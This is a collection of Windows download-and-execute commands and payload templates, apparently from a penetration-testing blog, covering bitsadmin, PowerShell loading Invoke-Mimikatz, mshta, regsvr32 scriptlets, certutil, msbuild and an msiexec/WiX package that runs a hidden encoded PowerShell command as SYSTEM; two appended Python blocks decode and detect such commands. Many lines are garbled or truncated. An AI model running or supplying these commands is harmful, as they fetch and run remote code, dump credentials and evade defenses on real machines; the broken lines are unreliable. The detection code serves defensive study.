Windows download-and-execute command collection
1. bitsadmin command (can only download to a specified path, Win7 and later):
bitsadmin /transfer myDownLoadJob /download /priority normal "img5.cacheease/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
bitsadmin /transfer d90f site/a %APPDATA%\&%APPDATA%\&del %APPDATA%\
2. powershell command download and execute (Win7 and later):
powershell IEX (New-Object Net.WebClient).DownloadString('raw.githubusercontent/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
powershell (new-object System.Net.WebClient).DownloadFile( ‘192.168.168.’,’C:\111111*********.exe’)
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('img5.cacheease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')
3. mshta command download and execute
mshta vbscript:Close(Execute("GetObject(""script:webserver/payload.sct"")"))
mshta webserver/payload.hta ---> short URL: sina.lt/ --> mshta t/RYUQyF8
mshta \\webdavserver\folder\payload.hta
payload.hta
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Set objShell = CreateObject("Wscript.Shell")
objShell.Run ""
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
4. rundll32 command download and execute
rundll32 \\webdavserver\folder\payload.dll,entrypoint
< javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:webserver/payload.sct");window.close();
5. regasm command download and execute
C:\Windows\Microsoft.NET\Framework64\v4.0. /u \\webdavserver\folder\payload.dll
< /k < \\webdavserver\
regsvr32 /u /n /s /i:webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:site/js.png scrobj.dll
js.png
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps  = " /";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
certutil -urlcache -split -f webserver/payload payload
certutil -urlcache -split -f webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f webserver/payload.b64 payload.b64 & certutil -decode payload. &
certutil -urlcache -split -f site/ && a.exe &&  && certutil -urlcache -split -f 192.168.254.102:80/a delete
9. MSBuild command download and execute
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0." & !MB! /noautoresponse /preprocess \\webdavserver\l > l & !MB! l"
10. odbcconf command download and execute
odbcconf /s /a {regsvr \\webdavserver\folder\}
11. cscript script remote command download and execute
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:raw.githubusercontent/3gstudent/test/master/downloadexec3.sct
cscript //E:jscript \\webdavserver\
downfile.vbs:
' Set your settings
strFileURL = "www.it1/images/it1_logo2.jpg"
strHDLocation = "c:\logo.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
Save the above as downfile.vbs
Enter the command: cscript downfile.vbs
12. pubprn.vbs download and execute command
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1  script:gist.githubusercontent/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
13. Windows built-in copy command
copy \\\
xcopy d:\  \\\
14. IEXPLORE.EXE command download and execute (requires an IE 0day)
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" site/exp
15. IEExec command download and execute
C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec site/
16. msiexec command download and execute
msiexec /q /i site/payloads/calc.png
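I have covered this method in my two earlier articles, "msiexec in Penetration Testing" and "Penetration Tips: Switching from Admin to System Privileges", so the details are not repeated here.
First, base64-encode the powershell code that performs the download and execute: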
$fileContent = "(new-object System.Net.WebClient).DownloadFile('github/3gstudent/test/raw/','c:\');start-process 'c:\'"
$bytes  = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
$encoded = [System.Convert]::ToBase64String($bytes);
$encoded
Result:
KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4A
The complete powershell command is:
powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzA
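Added example (not part of the original page): a defender-side triage helper in Python that reverses the encoding step above, i.e. base64 over UTF-16LE text, pulls the script out of a logged powershell command line, and tolerates a blob clipped by a log length limit. The sample script, the host example.invalid and all function names are constructed for illustration.

```python
import base64
import re

# Flag name followed by a base64-looking argument.
FLAG = re.compile(r"\s[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})")
# Tokens taken from the commands on this page.
INDICATORS = ("DownloadFile", "DownloadString", "IEX", "start-process")


def is_encoded_flag(name):
    """PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -enc, ...)."""
    name = name.lower()
    return name == "ec" or "encodedcommand".startswith(name)


def decode_blob(blob):
    """Return (script, truncated); truncated is True when clipping was detected."""
    truncated = False
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error: bad padding or length
        core = blob.rstrip("=")
        raw = base64.b64decode(core[: len(core) - len(core) % 4])
        truncated = True
    if len(raw) % 2:  # UTF-16LE needs whole 2-byte code units
        raw, truncated = raw[:-1], True
    return raw.decode("utf-16-le", errors="replace"), truncated


def triage(cmdline):
    """Decode the first encoded-command argument and list matching indicators."""
    for m in FLAG.finditer(cmdline):
        if is_encoded_flag(m.group(1)):
            script, truncated = decode_blob(m.group(2))
            hits = [t for t in INDICATORS if t.lower() in script.lower()]
            return {"script": script, "truncated": truncated, "indicators": hits}
    return None


# Constructed sample: placeholder host and path, encoded the same way as above.
SAMPLE = ("(new-object System.Net.WebClient).DownloadFile("
          "'http://example.invalid/a.exe','c:\\a.exe');start-process 'c:\\a.exe'")
BLOB = base64.b64encode(SAMPLE.encode("utf-16-le")).decode()

if __name__ == "__main__":
    print(triage("powershell -WindowStyle Hidden -enc " + BLOB))
    print(triage("powershell -w hidden -e " + BLOB[:-5]))  # clipped blob
```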
The complete wix file is:
<?xml version="1.0"?>
<Wix xmlns="schemas.microsoft/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" />
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQ    </Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR"
ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
invalid vbs to fail install
</CustomAction>
<InstallExecuteSequence>
<Custom Action="SystemShell" After="InstallInitialize"></Custom>
<Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>
Compile it to generate the msi file, with the following commands:
< msigen.wix
< msigen.wixobj
This generates test.msi
Resulting functionality:
msiexec /q /i github/3gstudent/test/raw/master/test.msi
Note:
After execution, the process must be ended manually
msiexec /q /i dwz/6UJpF8
17. GreatSCT, a project for download-and-execute commands
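Added example (not part of the original page or of GreatSCT): a Python sketch of detection logic for the command shapes listed in sections 1 to 16, meant to run over process-creation command lines. The rule names, regexes, hosts and sample events are constructed for illustration and need tuning against a real baseline.

```python
import re

REMOTE = r"(?:https?://|\\\\[^\\\s]+\\)"  # URL, or UNC/WebDAV share path
EXE = r"(?:\.exe)?\b"
# (rule name, regex on the lower-cased command line); shapes follow this page's commands.
RULES = [
    ("bitsadmin_transfer", r"\bbitsadmin" + EXE + r".*\s/transfer\b"),
    ("powershell_webclient", r"\bpowershell" + EXE + r".*\bdownload(?:string|file)\b"),
    ("powershell_encoded", r"\bpowershell" + EXE + r".*\s-e(?:c|nc\w*)?\s+[a-z0-9+/=]{16,}"),
    ("mshta_remote", r"\bmshta" + EXE + r".*(?:vbscript:|javascript:|" + REMOTE + ")"),
    ("rundll32_remote", r"\brundll32" + EXE + r".*(?:javascript:|" + REMOTE + ")"),
    ("regsvr32_scrobj", r"\bregsvr32" + EXE + r".*/i:\S+\s+scrobj\.dll"),
    ("certutil_urlcache", r"\bcertutil" + EXE + r".*-urlcache\b.*\s-f\b"),
    ("odbcconf_regsvr", r"\bodbcconf" + EXE + r".*\bregsvr\s+" + REMOTE),
    ("pubprn_script", r"\bpubprn\.vbs\b.*\sscript:"),
    ("msiexec_remote", r"\bmsiexec" + EXE + r'.*\s/i\s+"?' + REMOTE),
]
COMPILED = [(name, re.compile(rx)) for name, rx in RULES]


def match_rules(cmdline):
    """Return the names of all rules that match one process command line."""
    low = cmdline.lower()
    return [name for name, rx in COMPILED if rx.search(low)]


def scan(events):
    """events: (host, cmdline) pairs, e.g. from process-creation logs."""
    hits = ((host, cmd, match_rules(cmd)) for host, cmd in events)
    return [h for h in hits if h[2]]


# Constructed sample events; hosts, job names and paths are placeholders.
SAMPLE_EVENTS = [
    ("ws01", r'bitsadmin /transfer job1 /download /priority normal "http://example.invalid/a.jpg" "d:\abc.jpg"'),
    ("ws02", r"regsvr32 /u /n /s /i:http://example.invalid/payload.sct scrobj.dll"),
    ("ws03", r"certutil -urlcache -split -f http://example.invalid/payload payload"),
    ("ws04", r"msiexec /q /i http://example.invalid/test.msi"),
    ("ws05", r"mshta \\webdavserver\folder\payload.hta"),
    ("ws06", r"msiexec /i C:\installers\app.msi /qn"),        # benign install
    ("ws07", r"certutil -hashfile C:\temp\file.zip SHA256"),  # benign hashing
]

if __name__ == "__main__":
    for host, cmd, rules in scan(SAMPLE_EVENTS):
        print(host, rules, cmd)
```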
